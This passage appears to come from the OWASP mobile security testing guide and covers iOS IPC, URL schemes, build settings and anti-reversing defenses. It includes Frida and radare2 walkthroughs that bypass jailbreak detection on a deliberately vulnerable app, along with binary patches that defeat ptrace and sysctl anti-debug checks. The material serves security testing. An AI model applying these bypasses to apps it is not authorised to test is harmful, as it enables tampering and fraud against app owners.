The entitlement outlined above does not require any additional permissions from the user. However, it is always a good practice to check all entitlements, as the app might overask the user in terms of permissions and thereby leak information.
As documented at Apple Developer Documentation, the App Groups entitlement is required to share information between different apps through IPC or a shared file container, which means that data can be shared on the device directly between the apps. This entitlement is also required if an app extension requires to share information with its containing app.
Depending on the data to-be-shared it might be more appropriate to share it using another method such as through a backend where this data could be potentially verified, avoiding tampering by e.g. the user themselves.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#inter-process-communication-ipc","title":"Inter-Process Communication (IPC)","text":"During implementation of a mobile application, developers may apply traditional techniques for IPC (such as using shared files or network sockets). The IPC system functionality offered by mobile application platforms should be used because it is much more mature than traditional techniques. Using IPC mechanisms with no security in mind may cause the application to leak or expose sensitive data.
In contrast to Android's rich Inter-Process Communication (IPC) capability, iOS offers some rather limited options for communication between apps. In fact, there's no way for apps to communicate directly. In this section we will present the different types of indirect communication offered by iOS and how to test them. Here's an overview:
Custom URL schemes allow apps to communicate via a custom protocol. An app must declare support for the schemes and handle incoming URLs that use those schemes.
Apple warns about the improper use of custom URL schemes in the Apple Developer Documentation:
URL schemes offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow other apps to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
They also suggest using universal links instead, if the purpose is to implement deep linking:
While custom URL schemes are an acceptable form of deep linking, universal links are strongly recommended as a best practice.
Supporting a custom URL scheme is done by:
Security issues arise when an app processes calls to its URL scheme without properly validating the URL and its parameters and when users aren't prompted for confirmation before triggering an important action.
One example is the following bug in the Skype Mobile app, discovered in 2010: The Skype app registered the skype://
protocol handler, which allowed other apps to trigger calls to other Skype users and phone numbers. Unfortunately, Skype didn't ask users for permission before placing the calls, so any app could call arbitrary numbers without the user's knowledge. Attackers exploited this vulnerability by putting an invisible <iframe src=\"skype://xxx?call\"></iframe>
(where xxx
was replaced by a premium number), so any Skype user who inadvertently visited a malicious website called the premium number.
As a developer, you should carefully validate any URL before calling it. You can allow only certain applications which may be opened via the registered protocol handler. Prompting users to confirm the URL-invoked action is another helpful control.
All URLs are passed to the app delegate, either at launch time or while the app is running or in the background. To handle incoming URLs, the delegate should implement methods to:
More information can be found in the archived App Programming Guide for iOS and in the Apple Secure Coding Guide.
In addition, an app may also want to send URL requests (aka. queries) to other apps. This is done by:
Universal links are the iOS equivalent to Android App Links (aka. Digital Asset Links) and are used for deep linking. When tapping a universal link (to the app's website), the user will seamlessly be redirected to the corresponding installed app without going through Safari. If the app isn\u2019t installed, the link will open in Safari.
Universal links are standard web links (HTTP/HTTPS) and are not to be confused with custom URL schemes, which originally were also used for deep linking.
For example, the Telegram app supports both custom URL schemes and universal links:
tg://resolve?domain=fridadotre
is a custom URL scheme and uses the tg://
scheme.https://telegram.me/fridadotre
is a universal link and uses the https://
scheme.Both result in the same action, the user will be redirected to the specified chat in Telegram (\"fridadotre\" in this case). However, universal links give several key benefits that are not applicable when using custom URL schemes and are the recommended way to implement deep linking, according to the Apple Developer Documentation. Specifically, universal links are:
You can learn more about Universal Links in the post \"Learning about Universal Links and Fuzzing URL Schemes on iOS with Frida\" by Carlos Holguera.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#uiactivity-sharing","title":"UIActivity Sharing","text":"Starting on iOS 6 it is possible for third-party apps to share data (items) via specific mechanisms like AirDrop, for example. From a user perspective, this feature is the well-known system-wide \"Share Activity Sheet\" that appears after clicking on the \"Share\" button.
The available built-in sharing mechanisms (aka. Activity Types) include:
A full list can be found in UIActivity.ActivityType. If not considered appropriate for the app, the developers have the possibility to exclude some of these sharing mechanisms.
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#app-extensions","title":"App extensions","text":"Together with iOS 8, Apple introduced App Extensions. According to Apple App Extension Programming Guide, app extensions let apps offer custom functionality and content to users while they\u2019re interacting with other apps or the system. In order to do this, they implement specific, well scoped tasks like, for example, define what happens after the user clicks on the \"Share\" button and selects some app or action, provide the content for a Today widget or enable a custom keyboard.
Depending on the task, the app extension will have a particular type (and only one), the so-called extension points. Some notable ones are:
There are three important elements here:
For example, the user selects text in the host app, clicks on the \"Share\" button and selects one \"app\" or action from the list. This triggers the app extension of the containing app. The app extension displays its view within the context of the host app and uses the items provided by the host app, the selected text in this case, to perform a specific task (post it on a social network, for example). See this picture from the Apple App Extension Programming Guide which pretty good summarizes this:
"},{"location":"MASTG/iOS/0x06h-Testing-Platform-Interaction/#security-considerations","title":"Security Considerations","text":"From the security point of view it is important to note that:
openURL:completionHandler:
method of the NSExtensionContext
class.In addition:
When typing data into input fields, the clipboard can be used to copy in data. The clipboard is accessible system-wide and is therefore shared by apps. This sharing can be misused by malicious apps to get sensitive data that has been stored in the clipboard.
When using an app you should be aware that other apps might be reading the clipboard continuously, as the Facebook app did. Before iOS 9, a malicious app might monitor the pasteboard in the background while periodically retrieving [UIPasteboard generalPasteboard].string
. As of iOS 9, pasteboard content is accessible to apps in the foreground only, which reduces the attack surface of password sniffing from the clipboard dramatically. Still, copy-pasting passwords is a security risk you should be aware of, but also cannot be solved by an app.
The UIPasteboard
enables sharing data within an app, and from an app to other apps. There are two kinds of pasteboards:
Security Considerations:
Code signing your app assures users that the app has a known source and hasn't been modified since it was last signed. Before your app can integrate app services, be installed on a non-jailbroken device, or be submitted to the App Store, it must be signed with a certificate issued by Apple. For more information on how to request certificates and code sign your apps, review the App Distribution Guide.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#third-party-libraries","title":"Third-Party Libraries","text":"iOS applications often make use of third party libraries which accelerate development as the developer has to write less code in order to solve a problem. However, third party libraries may contain vulnerabilities, incompatible licensing, or malicious content. Additionally, it is difficult for organizations and developers to manage application dependencies, including monitoring library releases and applying available security patches.
There are three widely used package management tools Swift Package Manager, Carthage, and CocoaPods:
There are two categories of libraries:
OHHTTPStubs
used for testing.Alamofire
.These libraries can lead to unwanted side-effects:
AFNetworking
version 2.5.1, which contained a bug that disabled certificate validation. This vulnerability would allow attackers to execute man-in-the-middle attacks against apps that are using the library to connect to their APIs.Please note that this issue can hold on multiple levels: When you use webviews with JavaScript running in the webview, the JavaScript libraries can have these issues as well. The same holds for plugins/libraries for Cordova, React-native and Xamarin apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#memory-corruption-bugs","title":"Memory Corruption Bugs","text":"iOS applications have various ways to run into memory corruption bugs: first there are the native code issues which have been mentioned in the general Memory Corruption Bugs section. Next, there are various unsafe operations with both Objective-C and Swift to actually wrap around native code which can create issues. Last, both Swift and Objective-C implementations can result in memory leaks due to retaining objects which are no longer in use.
Learn more:
Detecting the presence of binary protection mechanisms heavily depend on the language used for developing the application.
Although Xcode enables all binary security features by default, it may be relevant to verify this for old applications or to check for compiler flag misconfigurations. The following features are applicable:
MH_EXECUTE
).MH_DYLIB
).Learn more:
Tests to detect the presence of these protection mechanisms heavily depend on the language used for developing the application. For example, existing techniques for detecting the presence of stack canaries do not work for pure Swift apps.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#xcode-project-settings","title":"Xcode Project Settings","text":""},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#stack-canary-protection","title":"Stack Canary protection","text":"Steps for enabling stack canary protection in an iOS application:
Steps for building an iOS application as PIE:
ARC is automatically enabled for Swift apps by the swiftc
compiler. However, for Objective-C apps you'll have ensure that it's enabled by following these steps:
See the Technical Q&A QA1788 Building a Position Independent Executable.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debuggable-apps","title":"Debuggable Apps","text":"Apps can be made debuggable by adding the get-task-allow
key to the app entitlements file and setting it to true
.
While debugging is a useful feature when developing an app, it has to be turned off before releasing apps to the App Store or within an enterprise program. To do that you need to determine the mode in which your app is to be generated to check the flags in the environment:
As a good practice, as little explanatory information as possible should be provided with a compiled binary. The presence of additional metadata such as debug symbols might provide valuable information about the code, e.g. function names leaking information about what a function does. This metadata is not required to execute the binary and thus it is safe to discard it for the release build, which can be done by using proper compiler configurations. As a tester you should inspect all binaries delivered with the app and ensure that no debugging symbols are present (at least those revealing any valuable information about the code).
When an iOS application is compiled, the compiler generates a list of debug symbols for each binary file in an app (the main app executable, frameworks, and app extensions). These symbols include class names, global variables, and method and function names which are mapped to specific files and line numbers where they're defined. Debug builds of an app place the debug symbols in a compiled binary by default, while release builds of an app place them in a companion Debug Symbol file (dSYM) to reduce the size of the distributed app.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#debugging-code-and-error-logging","title":"Debugging Code and Error Logging","text":"To speed up verification and get a better understanding of errors, developers often include debugging code, such as verbose logging statements (using NSLog
, println
, print
, dump
, and debugPrint
) about responses from their APIs and about their application's progress and/or state. Furthermore, there may be debugging code for \"management-functionality\", which is used by developers to set the application's state or mock responses from an API. Reverse engineers can easily use this information to track what's happening with the application. Therefore, debugging code should be removed from the application's release version.
Exceptions often occur after an application enters an abnormal or erroneous state. Testing exception handling is about making sure that the application will handle the exception and get into a safe state without exposing any sensitive information via its logging mechanisms or the UI.
Bear in mind that exception handling in Objective-C is quite different from exception handling in Swift. Bridging the two approaches in an application that is written in both legacy Objective-C code and Swift code can be problematic.
"},{"location":"MASTG/iOS/0x06i-Testing-Code-Quality-and-Build-Settings/#exception-handling-in-objective-c","title":"Exception Handling in Objective-C","text":"Objective-C has two types of errors:
NSException:
NSException
is used to handle programming and low-level errors (e.g., division by 0 and out-of-bounds array access). An NSException
can either be raised by raise
or thrown with @throw
. Unless caught, this exception will invoke the unhandled exception handler, with which you can log the statement (logging will halt the program). @catch
allows you to recover from the exception if you're using a @try
-@catch
-block:
@try {\n //do work here\n }\n\n@catch (NSException *e) {\n //recover from exception\n}\n\n@finally {\n //cleanup\n
Bear in mind that using NSException
comes with memory management pitfalls: you need to clean up allocations from the try block that are in the finally block. Note that you can promote NSException
objects to NSError
by instantiating an NSError
in the @catch
block.
NSError:
NSError
is used for all other types of errors. Some Cocoa framework APIs provide errors as objects in their failure callback in case something goes wrong; those that don't provide them pass a pointer to an NSError
object by reference. It is a good practice to provide a BOOL
return type to the method that takes a pointer to an NSError
object to indicate success or failure. If there's a return type, make sure to return nil
for errors. If NO
or nil
is returned, it allows you to inspect the error/reason for failure.
Exception handing in Swift (2 - 5) is quite different. The try-catch block is not there to handle NSException
. The block is used to handle errors that conform to the Error
(Swift 3) or ErrorType
(Swift 2) protocol. This can be challenging when Objective-C and Swift code are combined in an application. Therefore, NSError
is preferable to NSException
for programs written in both languages. Furthermore, error-handling is opt-in in Objective-C, but throws
must be explicitly handled in Swift. To convert error-throwing, look at the Apple documentation. Methods that can throw errors use the throws
keyword. The Result
type represents a success or failure, see Result, How to use Result in Swift 5 and The power of Result types in Swift. There are four ways to handle errors in Swift:
do-catch
; there's only a throw
throwing the actual error or a try
to execute the method that throws. The method containing the try
also requires the throws
keyword:func dosomething(argumentx:TypeX) throws {\n try functionThatThrows(argumentx: argumentx)\n}\n
do-catch
statement. You can use the following pattern:func doTryExample() {\n do {\n try functionThatThrows(number: 203)\n } catch NumberError.lessThanZero {\n // Handle number is less than zero\n } catch let NumberError.tooLarge(delta) {\n // Handle number is too large (with delta value)\n } catch {\n // Handle any other errors\n }\n}\n\nenum NumberError: Error {\n case lessThanZero\n case tooLarge(Int)\n case tooSmall(Int)\n}\n\nfunc functionThatThrows(number: Int) throws -> Bool {\n if number < 0 {\n throw NumberError.lessThanZero\n } else if number < 10 {\n throw NumberError.tooSmall(10 - number)\n } else if number > 100 {\n throw NumberError.tooLarge(100 - number)\n } else {\n return true\n }\n}\n
let x = try? functionThatThrows()\n // In this case the value of x is nil in case of an error.\n
try!
expression to assert that the error won't occur.Result
return:enum ErrorType: Error {\n case typeOne\n case typeTwo\n}\n\nfunc functionWithResult(param: String?) -> Result<String, ErrorType> {\n guard let value = param else {\n return .failure(.typeOne)\n }\n return .success(value)\n}\n\nfunc callResultFunction() {\n let result = functionWithResult(param: \"OWASP\")\n\n switch result {\n case let .success(value):\n // Handle success\n case let .failure(error):\n // Handle failure (with error)\n }\n}\n
Result
type:struct MSTG: Codable {\n var root: String\n var plugins: [String]\n var structure: MSTGStructure\n var title: String\n var language: String\n var description: String\n}\n\nstruct MSTGStructure: Codable {\n var readme: String\n}\n\nenum RequestError: Error {\n case requestError(Error)\n case noData\n case jsonError\n}\n\nfunc getMSTGInfo() {\n guard let url = URL(string: \"https://raw.githubusercontent.com/OWASP/owasp-mastg/master/book.json\") else {\n return\n }\n\n request(url: url) { result in\n switch result {\n case let .success(data):\n // Handle success with MSTG data\n let mstgTitle = data.title\n let mstgDescription = data.description\n case let .failure(error):\n // Handle failure\n switch error {\n case let .requestError(error):\n // Handle request error (with error)\n case .noData:\n // Handle no data received in response\n case .jsonError:\n // Handle error parsing JSON\n }\n }\n }\n}\n\nfunc request(url: URL, completion: @escaping (Result<MSTG, RequestError>) -> Void) {\n let task = URLSession.shared.dataTask(with: url) { data, _, error in\n if let error = error {\n return completion(.failure(.requestError(error)))\n } else {\n if let data = data {\n let decoder = JSONDecoder()\n guard let response = try? decoder.decode(MSTG.self, from: data) else {\n return completion(.failure(.jsonError))\n }\n return completion(.success(response))\n }\n }\n }\n task.resume()\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/","title":"iOS Anti-Reversing Defenses","text":""},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#overview","title":"Overview","text":"This chapter covers defense-in-depth measures recommended for apps that process, or give access to, sensitive data or functionality. Research shows that many App Store apps often include these measures.
These measures should be applied as needed, based on an assessment of the risks caused by unauthorized tampering with the app and/or reverse engineering of the code.
You can learn more about principles and technical risks of reverse engineering and code modification in these OWASP documents:
The lack of any of these measures does not cause a vulnerability - instead, they are meant to increase the app's resilience against reverse engineering and specific client-side attacks.
None of these measures can assure a 100% effectiveness, as the reverse engineer will always have full access to the device and will therefore always win (given enough time and resources)!
For example, preventing debugging is virtually impossible. If the app is publicly available, it can be run on an untrusted device that is under full control of the attacker. A very determined attacker will eventually manage to bypass all the app's anti-debugging controls by patching the app binary or by dynamically modifying the app's behavior at runtime with tools such as Frida.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#jailbreak-detection","title":"Jailbreak Detection","text":"Jailbreak detection mechanisms are added to reverse engineering defense to make running the app on a jailbroken device more difficult. This blocks some of the tools and techniques reverse engineers like to use. Like most other types of defense, jailbreak detection is not very effective by itself, but scattering checks throughout the app's source code can improve the effectiveness of the overall anti-tampering scheme.
You can learn more about Jailbreak/Root Detection in the research study \"Jailbreak/Root Detection Evasion Study on iOS and Android\" by Dana Geist and Marat Nigmatullin.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#common-jailbreak-detection-checks","title":"Common Jailbreak Detection Checks","text":"Here we present three typical jailbreak detection techniques:
File-based Checks:
The app might be checking for files and directories typically associated with jailbreaks, such as:
/Applications/Cydia.app\n/Applications/FakeCarrier.app\n/Applications/Icy.app\n/Applications/IntelliScreen.app\n/Applications/MxTube.app\n/Applications/RockApp.app\n/Applications/SBSettings.app\n/Applications/WinterBoard.app\n/Applications/blackra1n.app\n/Library/MobileSubstrate/DynamicLibraries/LiveClock.plist\n/Library/MobileSubstrate/DynamicLibraries/Veency.plist\n/Library/MobileSubstrate/MobileSubstrate.dylib\n/System/Library/LaunchDaemons/com.ikey.bbot.plist\n/System/Library/LaunchDaemons/com.saurik.Cydia.Startup.plist\n/bin/bash\n/bin/sh\n/etc/apt\n/etc/ssh/sshd_config\n/private/var/lib/apt\n/private/var/lib/cydia\n/private/var/mobile/Library/SBSettings/Themes\n/private/var/stash\n/private/var/tmp/cydia.log\n/var/tmp/cydia.log\n/usr/bin/sshd\n/usr/libexec/sftp-server\n/usr/libexec/ssh-keysign\n/usr/sbin/sshd\n/var/cache/apt\n/var/lib/apt\n/var/lib/cydia\n/usr/sbin/frida-server\n/usr/bin/cycript\n/usr/local/bin/cycript\n/usr/lib/libcycript.dylib\n/var/log/syslog\n
Checking File Permissions:
The app might be trying to write to a location that's outside the application's sandbox. For instance, it may attempt to create a file in, for example, the /private
directory. If the file is created successfully, the app can assume that the device has been jailbroken.
do {\n let pathToFileInRestrictedDirectory = \"/private/jailbreak.txt\"\n try \"This is a test.\".write(toFile: pathToFileInRestrictedDirectory, atomically: true, encoding: String.Encoding.utf8)\n try FileManager.default.removeItem(atPath: pathToFileInRestrictedDirectory)\n // Device is jailbroken\n} catch {\n // Device is not jailbroken\n}\n
Checking Protocol Handlers:
The app might be attempting to call well-known protocol handlers such as cydia://
(available by default after installing Cydia).
if let url = URL(string: \"cydia://package/com.example.package\"), UIApplication.shared.canOpenURL(url) {\n // Device is jailbroken\n}\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#automated-jailbreak-detection-bypass","title":"Automated Jailbreak Detection Bypass","text":"The quickest way to bypass common Jailbreak detection mechanisms is objection. You can find the implementation of the jailbreak bypass in the jailbreak.ts script.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#manual-jailbreak-detection-bypass","title":"Manual Jailbreak Detection Bypass","text":"If the automated bypasses aren't effective you need to get your hands dirty and reverse engineer the app binaries until you find the pieces of code responsible for the detection and either patch them statically or apply runtime hooks to disable them.
Step 1: Reverse Engineering:
When you need to reverse engineer a binary looking for jailbreak detection, the most obvious way is to search for known strings, such as \"jail\" or \"jailbreak\". Note that this won't be always effective, especially when resilience measures are in place or simply when the the developer has avoided such obvious terms.
Example: Download the Damn Vulnerable iOS application (DVIA-v2), unzip it, load the main binary into radare2 and wait for the analysis to complete.
r2 -A ./DVIA-v2-swift/Payload/DVIA-v2.app/DVIA-v2\n
Now you can list the binary's symbols using the is
command and apply a case-insensitive grep (~+
) for the string \"jail\".
[0x1001a9790]> is~+jail\n...\n2230 0x001949a8 0x1001949a8 GLOBAL FUNC 0 DVIA_v2.JailbreakDetectionViewController.isJailbroken.allocator__Bool\n7792 0x0016d2d8 0x10016d2d8 LOCAL FUNC 0 +[JailbreakDetection isJailbroken]\n...\n
As you can see, there's an instance method with the signature -[JailbreakDetectionVC isJailbroken]
.
Step 2: Dynamic Hooks:
Now you can use Frida to bypass jailbreak detection by performing the so-called early instrumentation, that is, by replacing function implementation right at startup.
Use frida-trace
on your host computer:
frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]\"\n
This will start the app, trace calls to -[JailbreakDetectionVC isJailbroken]
, and create a JavaScript hook for each matching element. Open ./__handlers__/__JailbreakDetectionVC_isJailbroken_.js
with your favouritte editor and edit the onLeave
callback function. You can simply replace the return value using retval.replace()
to always return 0
:
onLeave: function (log, retval, state) {\n console.log(\"Function [JailbreakDetectionVC isJailbroken] originally returned:\"+ retval);\n retval.replace(0); \n console.log(\"Changing the return value to:\"+retval);\n}\n
This will provide the following output:
$ frida-trace -U -f /Applications/DamnVulnerableIOSApp.app/DamnVulnerableIOSApp -m \"-[JailbreakDetectionVC isJailbroken]:\"\n\nInstrumenting functions... `...\n-[JailbreakDetectionVC isJailbroken]: Loaded handler at \"./__handlers__/__JailbreakDetectionVC_isJailbroken_.js\"\nStarted tracing 1 function. Press Ctrl+C to stop.\n\nFunction [JailbreakDetectionVC isJailbroken] originally returned:0x1\nChanging the return value to:0x0\n
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#anti-debugging-detection","title":"Anti-Debugging Detection","text":"Exploring applications using a debugger is a very powerful technique during reversing. You can not only track variables containing sensitive data and modify the control flow of the application, but also read and modify memory and registers.
There are several anti-debugging techniques applicable to iOS which can be categorized as preventive or as reactive. When properly distributed throughout the app, these techniques act as a supportive measure to increase the overall resilience.
As seen in chapter \"Tampering and Reverse Engineering on iOS\", the iOS XNU kernel implements a ptrace
system call that's lacking most of the functionality required to properly debug a process (e.g. it allows attaching/stepping but not read/write of memory and registers).
Nevertheless, the iOS implementation of the ptrace
syscall contains a nonstandard and very useful feature: preventing the debugging of processes. This feature is implemented as the PT_DENY_ATTACH
request, as described in the official BSD System Calls Manual. In simple words, it ensures that no other debugger can attach to the calling process; if a debugger attempts to attach, the process will terminate. Using PT_DENY_ATTACH
is a fairly well-known anti-debugging technique, so you may encounter it often during iOS pentests.
Before diving into the details, it is important to know that ptrace
is not part of the public iOS API. Non-public APIs are prohibited, and the App Store may reject apps that include them. Because of this, ptrace
is not directly called in the code; it's called when a ptrace
function pointer is obtained via dlsym
.
The following is an example implementation of the above logic:
#import <dlfcn.h>\n#import <sys/types.h>\n#import <stdio.h>\ntypedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);\nvoid anti_debug() {\n ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, \"ptrace\");\n ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31\n}\n
Bypass: To demonstrate how to bypass this technique we'll use an example of a disassembled binary that implements this approach:
Let's break down what's happening in the binary. dlsym
is called with ptrace
as the second argument (register R1). The return value in register R0 is moved to register R6 at offset 0x1908A. At offset 0x19098, the pointer value in register R6 is called using the BLX R6 instruction. To disable the ptrace
call, we need to replace the instruction BLX R6
(0xB0 0x47
in Little Endian) with the NOP
(0x00 0xBF
in Little Endian) instruction. After patching, the code will be similar to the following:
Armconverter.com is a handy tool for conversion between bytecode and instruction mnemonics.
Bypasses for other ptrace-based anti-debugging techniques can be found in \"Defeating Anti-Debug Techniques: macOS ptrace variants\" by Alexander O'Mara.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#using-sysctl","title":"Using sysctl","text":"Another approach to detecting a debugger that's attached to the calling process involves sysctl
. According to the Apple documentation, it allows processes to set system information (if having the appropriate privileges) or simply to retrieve system information (such as whether or not the process is being debugged). However, note that just the fact that an app uses sysctl
might be an indicator of anti-debugging controls, though this won't be always be the case.
The Apple Documentation Archive includes an example which checks the info.kp_proc.p_flag
flag returned by the call to sysctl
with the appropriate parameters. According to Apple, you shouldn't use this code unless it's for the debug build of your program.
Bypass: One way to bypass this check is by patching the binary. When the code above is compiled, the disassembled version of the second half of the code is similar to the following:
After the instruction at offset 0xC13C, MOVNE R0, #1
is patched and changed to MOVNE R0, #0
(0x00 0x20 in in bytecode), the patched code is similar to the following:
You can also bypass a sysctl
check by using the debugger itself and setting a breakpoint at the call to sysctl
. This approach is demonstrated in iOS Anti-Debugging Protections #2.
Applications on iOS can detect if they have been started by a debugger by checking their parent PID. Normally, an application is started by the launchd process, which is the first process running in the user mode and has PID=1. However, if a debugger starts an application, we can observe that getppid
returns a PID different than 1
. This detection technique can be implemented in native code (via syscalls), using Objective-C or Swift as shown here:
func AmIBeingDebugged() -> Bool {\n return getppid() != 1\n}\n
Bypass: Similarly to the other techniques, this has also a trivial bypass (e.g. by patching the binary or by using Frida hooks).
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#file-integrity-checks","title":"File Integrity Checks","text":"There are two common approaches to check file integrity: using application source code integrity checks and using file storage integrity checks.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#application-source-code-integrity-checks","title":"Application Source Code Integrity Checks","text":"In the \"Tampering and Reverse Engineering on iOS\" chapter, we discussed the iOS IPA application signature check. We also saw that determined reverse engineers can bypass this check by re-packaging and re-signing an app using a developer or enterprise certificate. One way to make this harder is to add a custom check that determines whether the signatures still match at runtime.
Apple takes care of integrity checks with DRM. However, additional controls (such as in the example below) are possible. The mach_header
is parsed to calculate the start of the instruction data, which is used to generate the signature. Next, the signature is compared to the given signature. Make sure that the generated signature is stored or coded somewhere else.
int xyz(char *dst) {\n const struct mach_header * header;\n Dl_info dlinfo;\n\n if (dladdr(xyz, &dlinfo) == 0 || dlinfo.dli_fbase == NULL) {\n NSLog(@\" Error: Could not resolve symbol xyz\");\n [NSThread exit];\n }\n\n while(1) {\n\n header = dlinfo.dli_fbase; // Pointer on the Mach-O header\n struct load_command * cmd = (struct load_command *)(header + 1); // First load command\n // Now iterate through load command\n //to find __text section of __TEXT segment\n for (uint32_t i = 0; cmd != NULL && i < header->ncmds; i++) {\n if (cmd->cmd == LC_SEGMENT) {\n // __TEXT load command is a LC_SEGMENT load command\n struct segment_command * segment = (struct segment_command *)cmd;\n if (!strcmp(segment->segname, \"__TEXT\")) {\n // Stop on __TEXT segment load command and go through sections\n // to find __text section\n struct section * section = (struct section *)(segment + 1);\n for (uint32_t j = 0; section != NULL && j < segment->nsects; j++) {\n if (!strcmp(section->sectname, \"__text\"))\n break; //Stop on __text section load command\n section = (struct section *)(section + 1);\n }\n // Get here the __text section address, the __text section size\n // and the virtual memory address so we can calculate\n // a pointer on the __text section\n uint32_t * textSectionAddr = (uint32_t *)section->addr;\n uint32_t textSectionSize = section->size;\n uint32_t * vmaddr = segment->vmaddr;\n char * textSectionPtr = (char *)((int)header + (int)textSectionAddr - (int)vmaddr);\n // Calculate the signature of the data,\n // store the result in a string\n // and compare to the original one\n unsigned char digest[CC_MD5_DIGEST_LENGTH];\n CC_MD5(textSectionPtr, textSectionSize, digest); // calculate the signature\n for (int i = 0; i < sizeof(digest); i++) // fill signature\n sprintf(dst + (2 * i), \"%02x\", digest[i]);\n\n // return strcmp(originalSignature, signature) == 0; // verify signatures match\n\n return 0;\n }\n }\n cmd = (struct load_command *)((uint8_t *)cmd + cmd->cmdsize);\n }\n }\n\n}\n
Bypass:
Apps might choose to ensure the integrity of the application storage itself, by creating an HMAC or signature over either a given key-value pair or a file stored on the device, e.g. in the Keychain, UserDefaults
/NSUserDefaults
, or any database.
For example, an app might contain the following code to generate an HMAC with CommonCrypto
:
// Allocate a buffer to hold the digest and perform the digest.\n NSMutableData* actualData = [getData];\n //get the key from the keychain\n NSData* key = [getKey];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n [actualData appendData: digestBuffer];\n
This script performs the following steps:
NSMutableData
.After that, it might be verifying the HMACs by doing the following:
NSData* hmac = [data subdataWithRange:NSMakeRange(data.length - CC_SHA256_DIGEST_LENGTH, CC_SHA256_DIGEST_LENGTH)];\n NSData* actualData = [data subdataWithRange:NSMakeRange(0, (data.length - hmac.length))];\n NSMutableData* digestBuffer = [NSMutableData dataWithLength:CC_SHA256_DIGEST_LENGTH];\n CCHmac(kCCHmacAlgSHA256, [actualData bytes], (CC_LONG)[key length], [actualData bytes], (CC_LONG)[actualData length], [digestBuffer mutableBytes]);\n return [hmac isEqual: digestBuffer];\n
NSData
.NSData
.Note: if the app also encrypts files, make sure that it encrypts and then calculates the HMAC as described in Authenticated Encryption.
Bypass:
The presence of tools, frameworks and apps commonly used by reverse engineers may indicate an attempt to reverse engineer the app. Some of these tools can only run on a jailbroken device, while others force the app into debugging mode or depend on starting a background service on the mobile phone. Therefore, there are different ways that an app may implement to detect a reverse engineering attack and react to it, e.g. by terminating itself.
You can detect popular reverse engineering tools that have been installed in an unmodified form by looking for associated application packages, files, processes, or other tool-specific modifications and artifacts. In the following examples, we'll discuss different ways to detect the Frida instrumentation framework, which is used extensively in this guide and also in the real world. Other tools, such as Cydia Substrate or Cycript, can be detected similarly. Note that injection, hooking and DBI (Dynamic Binary Instrumentation) tools can often be detected implicitly, through runtime integrity checks, which are discussed below.
Bypass:
The following steps should guide you when bypassing detection of reverse engineering tools:
Refer to the chapter \"Tampering and Reverse Engineering on iOS\" for examples of patching and code injection.
"},{"location":"MASTG/iOS/0x06j-Testing-Resiliency-Against-Reverse-Engineering/#frida-detection","title":"Frida Detection","text":"Frida runs under the name of frida-server in its default configuration (injected mode) on a jailbroken device. When you explicitly attach to a target app (e.g. via frida-trace or the Frida CLI), Frida injects a frida-agent into the memory of the app. Therefore, you may expect to find it there after attaching to the app (and not before). On Android, verifying this is pretty straightforward as you can simply grep for the string \"frida\" in the memory maps of the process ID in the proc
directory (/proc/<pid>/maps
). However, on iOS the proc
directory is not available, but you can list the loaded dynamic libraries in an app with the function _dyld_image_count
.
Frida may also run in the so-called embedded mode, which also works for non-jailbroken devices. It consists of embedding a frida-gadget into the IPA and forcing the app to load it as one of its native libraries.
The application's static content, including its ARM-compiled binary and its external libraries, is stored inside the <Application>.app
directory. If you inspect the content of the /var/containers/Bundle/Application/<UUID>/<Application>.app
directory, you'll find the embedded frida-gadget as FridaGadget.dylib.
